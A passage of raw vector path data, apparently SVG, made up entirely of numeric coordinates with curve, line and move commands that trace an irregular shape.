932.88868,545.05032 935.98052,544.12398 C 938.04781,543.50461 941.09333,543.26867 942.74833,543.59967 C 944.50718,543.95144 946.04104,543.74261 946.44001,543.09707 C 947.21023,541.85083 951.4013,542.62206 954.5,544.58026 C 955.6,545.2754 958.64303,546.15614 961.2623,546.53746 C 963.88156,546.91878 966.23893,547.57759 966.50091,548.00147 C 966.94089,548.71338 972.18518,547.30761 974.5,545.85726 C 977.22178,544.15192 983.94121,543.91824 986.85965,545.42742 C 988.53222,546.29234 991.07761,547 992.51608,547 C 993.95455,547 995.89198,547.407 996.82147,547.90445 C 998.93482,549.03549 1012.6953,548.04776 1010.8358,546.89851 C 1009.7623,546.23505 1009.7556,545.84438 1010.8,544.8 C 1011.7027,543.89734 1012.2934,543.84059 1012.7916,544.60866 C 1013.1812,545.20922 1014.5697,546.26442 1015.8772,546.95354 C 1017.7511,547.94125 1018.4149,547.94674 1019.0127,546.97946 C 1020.0082,545.36873 1033.2036,546.11072 1033.7698,547.80926 C 1034.2712,549.31352 1040.6483,549.37806 1041.5691,547.8882 C 1041.947,547.2767 1041.7494,546.46315 1041.1299,546.08031 C 1040.5105,545.69746 1044.0528,545.57782 1049.0018,545.81443 C 1056.9641,546.19511 1058,546.04943 1058,544.549 C 1058,543.45497 1058.6209,542.98914 1059.75,543.23607 C 1060.7125,543.44656 1061.3764,544.188 1061.2252,544.88372 C 1061.0741,545.57944 1061.4313,545.85147 1062.019,545.48824 C 1062.6067,545.12501 1063.6304,545.25846 1064.2938,545.78479 C 1065.6747,546.8804 1081.6835,548.33137 1093.5,548.43192 C 1100.5436,548.49186 1101.4649,548.70922 1101.2062,550.25 C 1100.9723,551.64273 1101.6358,552 1104.4562,552 C 1106.4053,552 1108,552.37633 1108,552.83629 C 1108,553.29625 1112.2672,553.68843 1117.4827,553.7078 C 1122.6982,553.72718 1128.2107,554.21547 1129.7327,554.7929 C 1131.2547,555.37033 1135.2887,556.05832 1138.6971,556.32176 C 1142.1055,556.58521 1146.3372,557.52058 1148.1008,558.40038 C 1149.8643,559.28017 1152.7381,560 1154.487,560 C 1156.2358,560 1157.9346,560.26794 1158.2621,560.59541 C 1158.5896,560.92289 1161.9271,561.33225 1165.6787,561.5051 C 1169.4304,561.67795 1174.9218,562.52495 1177.8817,563.38732 C 1180.8416,564.24969 1183.6031,564.74528 1184.0184,564.48864 C 1184.4336,564.232 1185.3295,564.69207 1186.0091,565.51101 C 1187.0172,566.72561 1186.9459,567 1185.6224,567 C 1184.7301,567 1183.9859,567.5625 1183.9686,568.25 C 1183.9169,570.30611 1179.7432,572.6718 1175.9365,572.80262 C 1171.9021,572.94126 1166.6531,575.29878 1167.7651,576.47269 C 1168.1693,576.89936 1167.6,576.97783 1166.5,576.64706 C 1165.4,576.31629 1163.825,576.47849 1163,577.00752 C 1161.7192,577.82879 1161.7558,577.97161 1163.25,577.98469 C 1164.2125,577.99311 1165,578.45 1165,579 C 1165,579.55 1163.6766,580 1162.059,580 C 1158.216,580 1157.4403,581.44031 1159.9381,583.93809 C 1162.6064,586.60638 1166.6431,587.52899 1169.3383,586.08656 C 1172.0604,584.62974 1203.8066,585.36148 1209,587.00075 C 1210.925,587.60837 1223.1875,588.375 1236.25,588.70436 L 1260,589.30321 L 1260,609.6516 L 1260,630 L 630,630 L 0,630 L -3.0314879e-016,609.68431 z M 371,534 C 371,533.45 372.35,533 374,533 C 375.65,533 377,533.45 377,534 C 377,534.55 375.65,535 374,535 C 372.35,535 371,534.55 371,534 z M 379.5,532 C 379.83992,531.45 381.32898,531.00689 382.80902,531.01531 C 384.91378,531.02729 385.17323,531.2418 384,532 C 382.02414,533.2769 378.71083,533.2769 379.5,532 z M 392,528.96862 C 392,528.43588 392.675,528 393.5,528 C 395.42067,528 395.42067,528.6246 393.5,529.36163 C 392.675,529.67821 392,529.50135 392,528.96862 z M 425,527 C 423.70731,526.1646 423.73371,526.02851 425.19098,526.01531 C 426.12102,526.00689 427.16008,526.45 427.5,527 C 428.28218,528.2656 426.95837,528.2656 425,527 z M 338,508.1206 C 335.525,507.33369 333.275,506.37893 333,505.9989 C 332.725,505.61888 331.29979,505.01444 329.83287,504.65572 C 327.5363,504.09411 327.20214,503.5448 327.4277,500.70202 C 327.71007,497.14326 323.62261,489.71045 322.7427,492.18262 C 321.92043,494.49286 321.16088,492.63458 320.82554,487.49221 C 320.53046,482.96711 320.68713,482.53229 322.5,482.84507 C 323.6,483.03486 324.1664,482.85126 323.75868,482.43708 C 323.35095,482.0229 323.57595,481.00208 324.25868,480.16859 C 325.31559,478.8783 325.16589,478.73927 323.251,479.23271 C 319.90562,480.09476 319.45751,478.19885 322.4075,475.66399 C 323.83338,474.43878 325,472.66315 325,471.71816 C 325,469.76859 326.95903,469.32682 327.07608,471.25 C 327.20016,473.28868 329.84106,465.71545 329.92392,463.08333 C 330.01972,460.04035 328.77096,461.12318 328.61498,464.21835 C 328.53421,465.82107 327.78861,466.60057 326.10924,466.838 C 324.14421,467.11581 323.84393,466.8491 324.42294,465.34023 C 324.81038,464.33056 325.58514,461.37001 326.14463,458.76123 C 326.70411,456.15245 327.52826,453.79155 327.97607,453.51479 C 328.42389,453.23802 328.3213,451.16393 327.74809,448.90569 C 327.00174,445.96529 327.01879,444.60642 327.80817,444.11856 C 328.41442,443.74388 330.13627,440.75975 331.63451,437.48716 C 333.7639,432.83596 334.40949,429.78652 334.59179,423.5185 C 334.72006,419.10833 335.31744,414.22517 335.91929,412.66704 C 336.52115,411.10891 337.22444,407.95891 337.48214,405.66704 C 337.73985,403.37517 338.24765,399.025 338.61059,396 C 338.97352,392.975 339.3199,388.1636 339.38032,385.30801 C 339.48043,380.57633 339.1803,379.83882 335.99508,376.9894 C 334.07279,375.26975 330.30022,372.75594 327.6116,371.40314 C 321.94729,368.5531 318.04905,365.14469 318.00083,363 C 317.98228,362.175 316.88872,359.7 315.5707,357.5 C 314.25268,355.3 311.48838,350.20089 309.4278,346.16864 C 307.36723,342.1364 304.61139,338.13625 303.30372,337.27944 C 301.99605,336.42262 301.10695,335.22173 301.32794,334.61079 C 301.54893,333.99986 301.32311,332.70949 300.82611,331.74331 C 300.15209,330.433 300.55231,329.35678 302.40116,327.50793 C 304.81072,325.09837 304.82633,324.99176 302.96083,323.68512 C 301.40146,322.59289 301.20692,321.79366 301.92278,319.42049 C 303.45016,314.35705 306.09084,310 307.63226,310 C 308.44944,310 308.83948,309.54929 308.49903,308.99842 C 308.15857,308.44756 309.2413,306.7535 310.90509,305.23387 C 313.61413,302.75954 313.92309,301.87817 313.8624,296.7975 C 313.81174,292.5562 313.31572,290.69071 311.89732,289.40707 C 310.85379,288.4627 310,286.88633 310,285.90403 C 310,284.92173 309.54655,283.83779 308.99233,283.49526 C 307.56339,282.61213 304.89562,285.56441 305.55943,287.29428 C 305.90386,288.19185 305.33588,288.94041 304.05656,289.27496 C 302.92545,289.57075 302,289.37457 302,288.83899 C 302,288.30342 301.10283,288.14997 300.00629,288.498 C 298.4412,288.99474 298.14887,288.77562 298.64652,287.47878 C 299.11216,286.26534 298.77864,285.89057 297.39023,286.06707 C 294.80535,286.39568 292,285.05965 292,283.5 C 292,282.1384 289.25914,280.56836 287.3834,280.85548 C 285.90234,281.0822 283.70951,278.37147 284.19523,276.91432 C 285.04926,274.35221 279.11114,269.95294 271.40195,267.43641 C 266.27494,265.76279 262.29652,263.69373 259.70693,261.3542 C 256.50343,258.46002 255.29692,257.93788 253.14112,258.5127 C 248.10409,259.85576 243.21486,259.04742 235.72188,255.63276 C 231.57997,253.74523 226.76773,251.88826 225.028,251.50615 C 223.28827,251.12404 221.62212,250.17884 221.32544,249.4057 C 221.02876,248.63257 220.25918,248 219.61525,248 C 217.32825,248 215.24926,244.27125 215.35198,240.35366 C 215.44071,236.96983 214.84748,235.84858 210.97731,232.08516 C 208.51479,229.69056 205.4875,227.06504 204.25,226.25066 C 203.0125,225.43629 202,223.92173 202,222.88499 C 202,221.84825 201.58795,221 201.08433,221 C 200.58071,221 198.48137,219.21939 196.41911,217.04309 C 194.35686,214.8668 192.38362,213.26291 192.03414,213.4789 C 191.68466,213.69489 190.82626,211.93281 190.12659,209.56316 C 189.30682,206.78678 188.02682,204.87762 186.527,204.19425 C 185.2469,203.611 183.97617,203.35716 183.70317,203.63016 C 182.55651,204.77682 184.71985,209.17985 187.0161,210.37293 C 188.38224,211.08275 189.3875,212.18922 189.25,212.83175 C 189.1125,213.47429 189.45,214 190,214 C 190.55,214 191,214.6199 191,215.37756 C 191,216.13521 191.74661,217.37271 192.65914,218.12756 C 193.57166,218.8824 195.30564,221.62852 196.51243,224.23004 C 197.71921,226.83156 198.93665,228.73002 199.21783,228.44883 C 199.49902,228.16765 200.44837,229.03536 201.32751,230.37708 C 202.68679,232.45162 202.71749,232.98957 201.5327,233.97286 C 200.437,234.88221 199.9047,234.69045 199.04009,233.07492 C 198.43543,231.9451 196.60405,230.32949 194.97036,229.48467 C 192.88284,228.40517 192,227.20842 192,225.45814 C 192,223.55513 191.1154,222.55865 188.25,221.23382 C 182.66355,218.65091 180.25769,216 183.5,216 C 185.79901,216 185.29193,214.37381 182.25,211.99126 C 180.7375,210.80662 177.88255,206.83645 175.90568,203.16868 C 173.9288,199.50091 171.8138,196.5 171.20568,196.5 C 170.59755,196.5 169.5375,195.9375 168.85,195.25 C 168.1625,194.5625 166.34,194 164.8,194 C 163.12118,194 162,193.46143 162,192.65499 C 162,191.91523 161.1,190.49549 160,189.5 C 158.9,188.50451 158,187.19235 158,186.58408 C 158,185.97582 156.43363,183.68306 154.51918,181.48907 C 152.60474,179.29508 151.02974,176.7125 151.01918,175.75 C 151.00863,174.7875 150.56125,174 150.025,174 C 149.4842,174 149.30632,172.71841 149.62557,171.12217 C 149.94213,169.53936 149.72837,167.36097 149.15054,166.28129 C 148.38634,164.85337 148.49213,163.01517 149.53862,159.53795 C 151.55214,152.8475 149.55113,145.02777 145.33386,143.10625 C 144.10594,142.54678 141.23735,140.91238 138.95923,139.47426 C 135.22375,137.11616 134.96058,136.69462 136.2781,135.17975 C 137.78017,133.45269 137.52096,130.56 135.95106,131.53024 C 135.4681,131.82873 134.20096,131.20096 133.13519,130.13519 C 132.06943,129.06943 130.21188,127.88463 129.0073,127.50232 C 127.47473,127.0159 126.96662,126.23565 127.31496,124.9036 C 127.58875,123.85662 127.40489,123 126.90638,123 C 126.40787,123 126,121.8199 126,120.37756 C 126,118.12556 125.78168,117.9363 124.45449,119.03777 C 123.60446,119.74323 123.14034,120.92333 123.42311,121.66021 C 124.32783,124.01788 120.1141,123.14644 117.81305,120.5 C 116.6175,119.125 115.11559,118 114.47547,118 C 113.83534,118 111.55399,116.24702 109.4058,114.10449 C 105.47343,110.18248 98.661301,106 96.205792,106 C 95.477688,106 95.090552,105.6625 95.345492,105.25 C 95.600431,104.8375 93.939488,104.47879 91.654508,104.45286 C 89.369529,104.42694 83.680164,104.12342 79.011477,103.77837 C 74.342789,103.43333 70.067789,103.50819 69.511477,103.94472 C 68.955164,104.38125 66.475,104.99305 64,105.30427 C 61.525,105.61549 57.800512,106.18517 55.723361,106.57023 C 51.969719,107.26607 51.952823,107.25428 52.94861,104.63517 C 54.010916,101.84109 52.711748,100.90576 51.292085,103.44256 C 50.848073,104.23596 49.363212,105.33244 47.992395,105.87917 C 45.855725,106.73135 45.785448,106.88545 47.5,106.95885 C 49.345307,107.03785 49.306634,107.19572 47,109 C 45.625,110.07554 44.076175,110.96553 43.558167,110.97776 C 43.040159,110.98999 39.665159,112.74553 36.058167,114.87895 C 32.451175,117.01237 28.04266,119.07199 26.261468,119.45589 C 24.480275,119.83978 22.765465,120.57047 22.450779,121.07964 C 22.106765,121.63627 21.105343,121.59156 19.939312,120.96752 C 18.87269,120.39668 18,120.33584 18,120.83231 C 18,121.70292 7.8618827,124.17301 7.1498645,123.47588 C 6.3910838,122.73296 8.2098333,121 9.7483095,121 C 10.644961,121 15.972631,119.14193 21.587577,116.87095 C 28.826514,113.94314 32.096235,112.0842 32.826613,110.4812 C 33.741666,108.47288 33.596277,108.2361 31.524288,108.36025 C 30.241485,108.43711 29.447557,108.91397 29.760004,109.41994 C 30.098018,109.96731 29.552912,109.99498 28.414045,109.48826 C 27.36132,109.01987 24.047341,108.68818 21.049647,108.75116 C 18.051953,108.81415 16.042009,108.5584 16.583105,108.18284 C 17.124201,107.80728 17.541497,106.825 17.510429,106 C 17.468259,104.88016 16.428126,104.56284 13.406341,104.74797 C 9.9974617,104.95681 8.7386718,104.43769 5.429369,101.4583 C 1.9081095,98.288093 1.6833497,97.814876 3.2653318,96.902064 C 4.2362644,96.341832 5.8343695,95.020783 6.8166766,93.9664 C 7.8205567,92.888861 9.893968,92.06536 11.551345,92.085921 C 15.598789,92.136135 21,90.940021 21,89.993489 C 21,88.718092 18.843387,88.358706 12.5,88.57702 C 4.2825696,88.859832 -1.2047343e-014,87.491171 2.1566082e-014,84.582163 C 4.3808232e-014,82.657259 0.84836051,82.115911 5.6821926,80.956293 C 10.056035,79.907024 11.45675,79.870249 11.765526,80.796578 C 11.986153,81.45846 13.329167,82 14.75,82 C 16.170833,82 17.035099,81.701766 16.670591,81.337257 C 15.627777,80.294443 2.7091127,75 1.2074166,75 C 0.1402633,75 0.17165735,74.685486 1.3571429,73.5 C 2.2206593,72.636484 4.6634737,72 7.1141202,72 C 10.078013,72 12.058052,71.35464 13.632627,69.875403 C 14.876468,68.706875 17.830472,67.354176 20.197078,66.869405 C 22.563685,66.384634 26.75,65.507988 29.5,64.921302 C 34.949264,63.758755 41.665601,63.675296 43.402164,64.748551 C 44.005313,65.121317 45.726306,65.29755 47.226594,65.14018 C 48.726882,64.982809 51.427152,65.34233 53.227195,65.939115 C 55.027238,66.5359 63.25,67.459657 71.5,67.991908 C 87.067066,68.996222 89.94493,69.297447 101.28136,71.109116 C 106.10216,71.879527 108.4357,71.883294 109.35282,71.122145 C 110.06239,70.533262 113.31077,69.815239 116.57147,69.526539 C 119.83216,69.237838 124.60479,68.627568 127.17731,68.170382 C 129.74983,67.713196 132.53577,67.720328 133.36829,68.186231 C 134.38919,68.757555 135.1819,68.497379 135.80328,67.387039 C 136.62807,65.91322 137.13187,66.017728 140.61229,68.38461 C 144.10094,70.757084 144.62056,70.864018 145.67449,69.426369 C 146.97269,67.655523 150.64064,67.939265 150.25945,69.781047 C 150.08555,70.621271 150.72702,70.674085 152.57455,69.971657 C 155.79524,68.747151 160.61188,68.721917 162.84649,69.917844 C 163.78974,70.422658 167.92266,71.098221 172.03075,71.419095 C 177.98845,71.884438 178.94348,71.783015 176.75,70.917918 C 173.24046,69.533773 173.24046,68.247906 176.75,67.716254 C 179.13987,67.35422 179.04165,67.278037 176,67.134519 C 172.25006,66.957581 170.30948,66.106137 169.99549,64.5 C 169.88797,63.95 169.395,63.6125 168.9,63.75 C 167.59847,64.111535 167.79521,62.615015 169.25,61.087605 C 170.27176,60.014841 170.04352,59.905465 168,60.488581 C 166.625,60.880934 165.00039,61.831512 164.38976,62.600975 C 163.77912,63.370439 162.20412,64.006891 160.88976,64.015313 C 159.57539,64.023735 157.86227,64.434288 157.08282,64.927652 C 156.15238,65.516588 154.44018,65.16787 152.09763,63.91234 C 150.13522,62.860553 147.17295,61.984054 145.51481,61.964565 C 142.54423,61.929649 142.53347,61.910546 144.78136,60.662595 C 146.03611,59.966002 146.77979,59.113127 146.43399,58.767319 C 146.08818,58.42151 146.72618,57.563438 147.85178,56.860492 C 149.27773,55.969969 149.59917,55.221957 148.9118,54.393727 C 147.5356,52.735506 158.05374,51.635251 164.11784,52.803092 C 166.65765,53.292216 170.08562,53.494278 171.73556,53.25212 C 173.38549,53.009961 176.12262,53.529169 177.81806,54.405915 C 179.5135,55.282662 181.76793,56 182.8279,56 C 183.88786,56 185.27676,56.628544 185.91432,57.396765 C 186.55189,58.164986 187.94312,58.56613 189.00594,58.288195 C 190.06877,58.01026 192.30222,58.258307 193.96918,58.83941 C 196.10371,59.583513 197,59.582042 197,58.834437 C 197,58.143028 198.56899,58.008197 201.5,58.447729 C 204.43044,58.887176 206,58.752384 206,58.061273 C 206,57.477573 206.87344,57 207.94098,57 C 209.00852,57 210.16008,56.55 210.5,56 C 211.18823,54.886427 218.28703,54.620367 219.33552,55.668848 C 219.70338,56.036715 219.21588,57.215248 218.25218,58.287811 C 216.57325,60.156399 216.59406,60.300758 218.75,61.740934 C 219.9875,62.56759 221,63.864057 221,64.621972 C 221,65.379887 221.3375,66.031005 221.75,66.0689 C 224.73973,66.343556 228.30318,66.961451 229.99605,67.498747 C 232.30346,68.23109 232.70046,70 230.55742,70 C 229.6456,70 229.2588,70.747534 229.50611,72.031733 C 229.87523,73.94839 229.51798,74.035711 223.19869,73.573428 L 216.5,73.083389 L 222,74.866376 C 225.025,75.847019 228.4,76.560687 229.5,76.452305 C 230.6,76.343923 233.1875,76.197816 235.25,76.127623 C 237.85995,76.038799 239,75.543978 239,74.5 C 239,73.675 238.55,73 238,73 C 235.59736,73 237.32642,71.212392 240.85567,70.047633 C 243.97894,69.01686 245.16615,69.017556 247.10567,70.051293 C 249.17837,71.156015 249.33837,71.131344 248.29679,69.867633 C 246.42964,67.602302 247.17178,63.878854 249.72204,62.716878 C 252.09604,61.635213 252.61027,60.495199 251.13535,59.583653 C 250.6598,59.289744 250.3223,58.025686 250.38535,56.774636 C 250.49246,54.649579 250.99242,54.480363 257.98822,54.201382 C 262.10675,54.037142 266.57717,54.179029 267.92251,54.516687 C 270.26767,55.105285 270.19774,55.227638 266.22725,57.482921 C 263.67191,58.934382 261.24366,59.614975 259.88659,59.260093 C 258.37365,58.864449 257.91052,59.046207 258.40265,59.842476 C 258.79677,60.480182 258.56417,61 257.8847,61 C 256.21292,61 260.82698,65.81031 263.23049,66.573154 C 264.34424,66.926644 264.92037,67.765118 264.60831,68.578346 C 264.31333,69.34706 264.39328,69.928117 264.78599,69.869583 C 266.67793,69.587584 270.35446,70.217101 269.30618,70.643555 C 268.64957,70.910668 268.36767,71.794569 268.67973,72.607779 C 269.16652,73.876325 269.51422,73.844611 271.12762,72.384508 C 272.66499,70.993205 273.46356,70.890181 275.50406,71.819897 C 278.12384,73.013549 278.88567,74.977466 276.75,75.031803 C 276.04588,75.049718 276.34771,75.70478 277.44113,76.531803 C 280.01808,78.48091 281.15241,78.385567 280.79384,76.25 C 280.6245,75.241474 281.13555,74.484324 282,74.463001 C 282.825,74.442652 284.28472,73.976317 285.24383,73.426701 C 286.83693,72.513777 286.85364,72.236053 285.43713,70.2137 C 284.36594,68.684371 282.85984,68 280.56542,68 C 276.31219,68 270.42477,65.549309 269.61623,63.442307 C 269.20612,62.373554 270.15209,60.647907 272.35653,58.443468 L 275.72316,55.076835 L 288.36158,55.176082 C 296.90188,55.243147 301.00497,55.636014 301.01531,56.387665 C 301.02623,57.180815 301.24144,57.173186 301.76531,56.361077 C 303.63308,53.465634 321.21387,56.226901 319.41746,59.133552 C 318.95778,59.877333 319.12323,60.041872 319.86799,59.581588 C 320.51534,59.181502 323.02246,59.959384 325.43936,61.310216 C 328.56856,63.059162 330.14268,63.457316 330.90685,62.69315 C 331.67102,61.928984 332.96153,62.088097 335.38927,63.245805 C 337.26438,64.139983 340.53139,65.193368 342.64928,65.586659 C 344.76718,65.97995 347.56703,66.996327 348.87118,67.845274 C 351.08435,69.285962 351.11767,69.437813 349.37118,70.124123 C 347.76955,70.753506 347.86014,70.879679 350,71 C 352.28892,71.128702 352.33113,71.20977 350.5,71.960152 C 348.64168,72.721676 348.69942,72.858374 351.3151,73.889867 C 352.8634,74.50044 355.3958,75 356.94265,75 C 358.48951,75 360.31531,75.675 361,76.5 C 361.68469,77.325 362.75229,78.00251 363.37244,78.005577 C 363.9926,78.008644 366.25685,78.498944 368.40411,79.095132 L 372.30821,80.17911 L 369.40411,82.553592 C 367.80685,83.859557 365.9375,84.944257 365.25,84.964037 C 364.5625,84.983817 364,85.45 364,86 C 364,87.869922 359.47731,87.008863 355.65436,84.411103 C 353.55892,82.98721 351.59886,82.067802 351.29869,82.367975 C 350.21457,83.452097 351.98021,86 353.81561,86 C 356.65429,86 359.59549,89.097411 360.33551,92.86617 C 360.95232,96.00748 360.84629,96.186812 358.74823,95.550793 C 352.5731,93.678818 352.44213,93.666062 353.75,95.063956 C 355.64667,97.091186 355.25233,98.088125 352.75,97.592072 C 351.5125,97.346754 347.575,96.60142 344,95.935774 C 340.425,95.270128 335.36159,93.440869 332.74798,91.870754 C 328.08131,89.067273 323.42284,88.323111 316.75267,89.315599 C 315.24164,89.540433 313.21664,89.139224 312.25267,88.424023 C 310.59676,87.195448 310.61042,87.041491 312.5,85.635327 C 313.86287,84.621122 316.16367,84.26666 319.72242,84.522634 C 322.59475,84.729236 325.20881,84.471162 325.53144,83.949137 C 325.85406,83.427112 325.52898,82.980112 324.80902,82.955804 C 324.08906,82.931496 325.1875,82.020746 327.25,80.931914 C 329.3125,79.843083 331,78.366709 331,77.651084 C 331,75.908926 323.84764,76.05762 322.45586,77.828712 C 321.27134,79.336062 314.8405,79.070149 314.32451,77.492484 C 314.14327,76.93835 315.15521,75.233719 316.57326,73.704415 L 319.15154,70.923863 L 316.57577,71.570339 C 314.912,71.987918 314,71.804286 314,71.051704 C 314,70.282351 313.24507,70.415364 311.77749,71.443296 C 310.55512,72.299483 308.86762,72.964474 308.02749,72.921053 C 306.99944,72.867918 306.90871,72.677189 307.75,72.337719 C 309.75503,71.528673 309.18851,69.805393 307.13208,70.458079 C 306.10473,70.784149 304.15466,70.629102 302.79861,70.113531 C 301.33343,69.556472 299.75831,69.539926 298.91653,70.072751 C 297.83616,70.756592 298.03396,70.973008 299.75,70.984687 C 301.07653,70.993715 302,71.615648 302,72.5 C 302,73.325 301.325,74 300.5,74 C 298.5882,74 298.54261,75.887254 300.43686,76.614144 C 302.83665,77.535029 301.01959,79.905699 297.3924,80.586163 C 294.11992,81.200085 291.62609,83 294.04797,83 C 294.68927,83 294.95672,83.670413 294.64229,84.489807 C 294.25887,85.488973 294.8823,86.183339 296.5353,86.598215 C 297.89088,86.938445 299,87.618032 299,88.108408 C 299,88.598784 300.09844,89 301.44098,89 C 304.00847,89 306.06159,90.87926 303.80902,91.167506 C 299.92659,91.664313 296.41859,91.386435 295.80728,90.533665 C 295.39363,89.956631 293.41818,90.520749 290.90375,91.93394 C 287.10182,94.070744 286.57916,94.144955 285.52126,92.698186 C 284.78322,91.68886 283.54469,91.306306 282.17479,91.664542 C 280.13937,92.196816 278.97218,90.561458 280.86782,89.833333 C 281.34511,89.65 282.06971,88.426767 282.47804,87.115037 L 283.22045,84.730075 L 279.7683,87.363156 C 277.86962,88.811351 275.12005,90.09523 273.65815,90.216221 C 272.19624,90.337211 269.84018,91.432931 268.42245,92.651153 C 267.00471,93.869375 263.85637,95.683729 261.42612,96.683051 C 258.99588,97.682373 257.00581,98.869643 257.00375,99.321429 C 257.00169,99.773214 256.30105,100.8418 255.44678,101.69607 C 253.06392,104.07894 254.00264,107.44243 257.15229,107.80699 C 258.92787,108.01251 260.1743,109.00415 260.9231,110.80699 C 261.94917,113.27742 262.54104,113.51458 268.0841,113.67646 C 272.02983,113.79169 275.05887,114.48357 276.81329,115.67034 C 280.77358,118.34928 286.79522,119.96765 292.86663,119.98482 C 297.82004,119.99883 298.19105,120.16143 297.68503,122.09645 C 296.92932,124.98628 297.87365,127 299.98454,127 C 300.95836,127 302.37271,127.74964 303.12756,128.66587 C 304.36701,130.17032 304.2254,130.26334 301.66621,129.62579 C 299.80091,129.16111 299.05211,129.2753 299.47523,129.95992 C 299.82877,130.53196 300.74412,131 301.50933,131 C 302.27454,131 303.33292,131.77248 303.86129,132.71662 C 304.70684,134.22754 305.12706,134.26996 307.36803,133.07063 C 309.42935,131.96744 309.72519,131.35502 308.92187,129.85401 C 308.37614,128.8343 308.18202,128 308.4905,128 C 308.79897,128 308.3585,126.66016 307.51167,125.02257 C 305.99856,122.09653 306.01969,122.03369 308.73599,121.38223 C 314.11672,120.09174 317,118.05581 317,115.5469 C 317,113.33485 313.71234,109.76852 310.69982,108.7127 C 309.85878,108.41794 310.0233,107.70167 311.25,106.31736 C 313.23945,104.0723 313.54067,102 311.87756,102 C 311.10205,102 311.1399,101.53636 312,100.5 C 312.99593,99.299981 312.98328,98.684777 311.93675,97.423785 C 309.85407,94.914313 312.57499,93.951183 320,94.56962 C 328.26429,95.257963 334.64224,96.863998 336.10344,98.624641 C 336.73124,99.381088 338.58793,100 340.22943,100 C 342.47152,100 343.07079,100.37315 342.63837,101.5 C 341.75341,103.80617 342.96005,105.92798 346.07152,107.53699 C 350.23149,109.68819 351.52894,109.3859 355.44573,105.35291 L 358.98773,101.70583 L 363.89212,106.10291 C 366.58953,108.52131 368.84229,111.0625 368.89825,111.75 C 368.95421,112.4375 369.45,113 370,113 C 370.55,113 371,113.94213 371,115.09362 C 371,116.34624 371.8034,117.39733 373,117.71025 C 374.1,117.99791 375,118.63078 375,119.11663 C 375,119.60248 375.83285,120 376.85078,120 C 380.12407,120 385,122.15269 385,123.59783 C 385,124.36902 385.8449,125 386.87756,125 C 389.36228,125 390.63727,126.74376 391.26458,131 C 391.65376,133.64054 391.25488,135.1139 389.64022,137 C 388.4631,138.375 387.89667,139.17833 388.38148,138.78518 C 388.8663,138.39203 390.2163,138.58771 391.38148,139.22003 C 392.54667,139.85234 394.56904,140.39901 395.87565,140.43484 C 398.9927,140.52033 402.39344,146.39634 400.91964,149.15016 C 399.68172,151.46323 394.48692,151.77945 395.36615,149.48821 C 395.88002,148.1491 395.60669,148.15203 392.97314,149.51389 C 390.23944,150.92754 389.5641,150.76067 389.88158,148.75 C 389.99544,148.02887 384.83249,147.59485 380.34551,147.94836 C 377.00743,148.21135 376.71183,146.41353 379.58436,143.31911 C 382.31285,140.37987 385.41531,135.08198 384.78007,134.44673 C 384.16467,133.83134 380,135.18055 380,135.99531 C 380,137.79943 373.79032,139.23098 368.73627,138.59199 L 363.5,137.92997 L 366.86278,140.01887 C 368.71231,141.16777 369.97079,142.36254 369.65941,142.67393 C 368.78162,143.55171 362,142.0295 362,140.95469 C 362,140.42961 361.2125,139.95514 360.25,139.90032 C 359.04239,139.83153 359.27484,139.52642 361,138.91588 C 362.77493,138.28773 361.76629,138.15749 357.52223,138.46682 C 354.03466,138.72101 351.11862,139.4801 350.52223,140.28903 C 349.96,141.05161 348.825,141.97853 348,142.34886 C 347.175,142.71918 347.625,142.78609 349,142.49754 C 357.38266,140.73841 359.95985,140.73179 360.62598,142.46771 C 361.01952,143.49326 360.72113,144.56296 359.89572,145.08561 C 359.12807,145.57168 358.8926,145.97627 359.37244,145.98469 C 359.85229,145.99311 359.71794,146.63494 359.07389,147.41097 C 357.80101,148.9447 359.235,150.59083 360.9309,149.54271 C 361.4429,149.22627 362.14446,149.42472 362.48992,149.98369 C 362.83538,150.54266 364.44148,151 366.05902,151 C 367.67656,151 368.94671,151.3375 368.88158,151.75 C 368.52312,154.02023 369.22527,153.98333 371.07258,151.63486 C 373.38399,148.69638 375,148.22942 375,150.5 C 375,151.325 375.45,152 376,152 C 376.55,152 377,152.34015 377,152.75589 C 377,153.6508 373.57322,155.22849 365.91183,157.86087 C 362.83834,158.9169 359.41045,160.35123 358.2943,161.04828 C 357.17815,161.74533 355.53032,162.03375 354.63247,161.68921 C 352.17636,160.74671 352.6705,158.07577 355.5,157 C 356.875,156.47723 358,155.85549 358,155.61837 C 358,154.88992 353.61945,156.25182 351.43134,157.66055 C 350.29357,158.39306 348.15607,159.09225 346.68134,159.2143 C 345.2066,159.33635 344,159.68941 344,159.99887 C 344,160.30833 342.7516,161.03274 341.22577,161.60868 C 338.35652,162.6917 337.138,166.34922 339.21814,167.63482 C 339.87131,168.0385 340.02272,167.84577 339.59549,167.15451 C 339.20305,166.51953 339.35852,166 339.94098,166 C 340.52344,166 341,166.62391 341,167.38646 C 341,168.26302 339.34506,169.02109 336.5,169.44773 C 334.025,169.81888 332,170.54497 332,171.06127 C 332,171.57757 331.09035,172 329.97856,172 C 328.79278,172 327.48623,173.03349 326.81805,174.5 C 325.76116,176.81961 324.74842,177.45371 322.67567,177.09364 C 322.22229,177.01489 322.14858,177.43139 322.51187,178.0192 C 322.87515,178.60701 322.41174,180.24885 321.48206,181.66772 C 320.21216,183.60584 320.03892,184.79001 320.78556,186.4287 C 321.57924,188.17064 321.34848,189.02324 319.63969,190.66225 C 318.46286,191.79104 316.4875,193.03413 315.25,193.42468 C 314.0125,193.81523 313,194.55445 313,195.06739 C 313,195.58032 312.35389,196 311.56421,196 C 310.77452,196 308.03732,197.90306 305.48154,200.22903 C 300.23529,205.00354 300.10016,206.24327 303.78977,215.74958 C 306.03684,221.53914 305.56214,226.26764 302.67808,226.82332 C 301.75514,227.00115 301,226.63925 301,226.01909 C 301,225.39893 299.64079,223.45344 297.97953,221.69577 C 296.31827,219.93809 295.05796,217.6 295.17883,216.5 C 295.29971,215.4 294.81743,213.43955 294.10709,212.14344 C 293.04221,210.20042 292.28019,209.89396 289.76463,210.39707 C 287.9273,210.76454 286.11229,210.50859 285.20185,209.75363 C 284.37034,209.06413 281.26431,208.5 278.29956,208.5 C 273.28663,208.5 272.9468,208.65026 273.44739,210.64554 C 273.93512,212.58961 273.6342,212.76187 270.24283,212.48003 C 268.18428,212.30894 264.6914,211.65259 262.48089,211.02145 C 258.16671,209.78969 256.98535,210.08775 249.5,214.2966 C 245.88084,216.33158 245.5,216.92438 245.5,220.52286 C 245.5,222.71029 245.12346,225.08269 244.66325,225.79487 C 243.57975,227.4716 243.50347,234.65951 244.52842,238.5 C 245.6555,242.72316 248.95065,246.88459 252.48626,248.54989 C 255.09242,249.77742 256.23183,249.77509 260.91135,248.53265 C 